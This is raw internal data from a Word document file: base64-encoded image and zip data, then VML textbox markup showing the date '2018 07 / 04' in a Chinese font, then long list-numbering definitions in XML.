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&#10;0MyZM39cg6UqiQABAgQIECBAgAABAgQIECBAgAABAgQIECBAgAABAmURcHRZWZgNQoAAAQIE6lZg&#10;93vf+97ne3p6bk7ga3HCX99K6GtTNHalDdetyr8WPhyLXQkKbsjRsisGBwe/LQxX598I5RMgQIAA&#10;AQIECBAgQIAAAQIECBAgQIAAAQIECBAgcNACdog7aEIdECBAgAABAq9UoKOjo+mkk056W4JxVycM&#10;9uZ8ru2VfrYG37c9Dj+Kw180NTXd097ePlSDNSqJAAECBAgQIECAAAECBAgQIECAAAECBAgQIECA&#10;AAECZRUQiCsrt8EIECBAgACBRYsWjUkI7DXNzc3vi8b5efyOelNJEO6x1Hxd2j2bN29+eP78+X31&#10;ZqBeAgQIECBAgAABAgQIECBAgAABAgQIECBAgAABAgQIlEKgsRSd6pMAAQIECBAgsDeBVatWDZ5z&#10;zjk9Y8eO3Zlg2LM5MrQI6B+V1pxW68e5DyUAuCk135ha16T+jXPnzu3JYxcBAgQIECBAgAABAgQI&#10;ECBAgAABAgQIECBAgAABAgQIjICAHeJGAFEXBAgQIECAwIEJLF68eFxjY+N7ExD7eMJhx6eXiWkt&#10;B9ZbxX9qIDPckTq/O2HChPnjx49/5uyzzx6s+FmbIAECBAgQIECAAAECBAgQIECAAAECBAgQIECA&#10;AAECBKpIQCCuihbLVAkQIECAQK0KJBj3uhyh2p6w2IzUOL0W68zOcD8dHh7+bn9//ycuu+yy3lqs&#10;UU0ECBAgQIAAAQIECBAgQIAAAQIECBAgQIAAAQIECBA41AKOTD3UK2B8AgQIECBA4LDp06fvGBgY&#10;uG/cuHG3JTg2lGDcGbkXR6jWyrVwcHDwhp6enq9efvnlu2qlKHUQIECAAAECBAgQIECAAAECBAgQ&#10;IECAAAECBAgQIECg0gQE4iptRcyHAAECBAjUocDatWt3r1mzZmjKlCndxxxzzM9yhOr6MExNKK41&#10;96JV47U7k96WcN8NORb2a3n8k+wM11WNhZgzAQIECBAgQIAAAQIECBAgQIAAAQIECBAgQIAAAQIE&#10;qkXAkanVslLmSYAAAQIE6kjgpptuekOOF700YbLpCcUVR6hOSaum31uGMt9n0n6WOv6upaXl/7S3&#10;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33" o:spid="_x0000_s1035" type="#_x0000_t75" style="position:absolute;top:831;width:9023;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MInBAAAA3AAAAA8AAABkcnMvZG93bnJldi54bWxET02LwjAQvS/4H8II3tbUIotU06KCIHhx&#10;Vdbr2IxttZmUJmr1128WhL3N433OLOtMLe7UusqygtEwAkGcW11xoeCwX31OQDiPrLG2TAqe5CBL&#10;ex8zTLR98Dfdd74QIYRdggpK75tESpeXZNANbUMcuLNtDfoA20LqFh8h3NQyjqIvabDi0FBiQ8uS&#10;8uvuZhTkix8sXsdue4jnl2oxws14709KDfrdfArCU+f/xW/3Wof5cQx/z4QLZPo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WMInBAAAA3AAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;">
                <v:imagedata r:id="rId3" o:title=""/>
              </v:shape>
              <v:group id="组合 34" o:spid="_x0000_s1036" style="position:absolute;left:51538;width:5938;height:5647" coordsize="10194,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6" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;width:10103;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1C27BBCB" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                        <w:pPr>
                          <w:adjustRightInd w:val="0"/>
                          <w:snapToGrid w:val="0"/>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="36"/>
                            <w:szCs w:val="36"/>
                          </w:rPr>
                          <w:t>2018</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="Text Box 7" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:46;top:2599;width:101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14:paraId="3B5C1591" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A">
                        <w:pPr>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="26"/>
                            <w:szCs w:val="26"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                            <w:b/>
                            <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
                            <w:sz w:val="26"/>
                            <w:szCs w:val="26"/>
                          </w:rPr>
                          <w:t>07 / 04</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
              </v:group>
              <w10:wrap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5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:color w:val="auto"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000008"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000008"/>
    <w:name w:val="WW8Num7"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
        <w:ind w:left="5120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5840"/>
        </w:tabs>
        <w:ind w:left="5840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6560"/>
        </w:tabs>
        <w:ind w:left="6560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7280"/>
        </w:tabs>
        <w:ind w:left="7280" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000000C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000000C"/>
    <w:name w:val="WW8Num11"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="926"/>
        </w:tabs>
        <w:ind w:left="926" w:hanging="567"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="−"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1799"/>
        </w:tabs>
        <w:ind w:left="1799" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2519"/>
        </w:tabs>
        <w:ind w:left="2519" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3239"/>
        </w:tabs>
        <w:ind w:left="3239" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3959"/>
        </w:tabs>
        <w:ind w:left="3959" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4679"/>
        </w:tabs>
        <w:ind w:left="4679" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5399"/>
        </w:tabs>
        <w:ind w:left="5399" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6119"/>
        </w:tabs>
        <w:ind w:left="6119" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6839"/>
        </w:tabs>
        <w:ind w:left="6839" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000017"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000017"/>
    <w:name w:val="WW8Num22"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1444"/>
        </w:tabs>
        <w:ind w:left="1444" w:hanging="284"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2240"/>
        </w:tabs>
        <w:ind w:left="2240" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        <w:sz w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2960"/>
        </w:tabs>
        <w:ind w:left="2960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3680"/>
        </w:tabs>
        <w:ind w:left="3680" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4400"/>
        </w:tabs>
        <w:ind w:left="4400" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5120"/>
        </w:tabs>
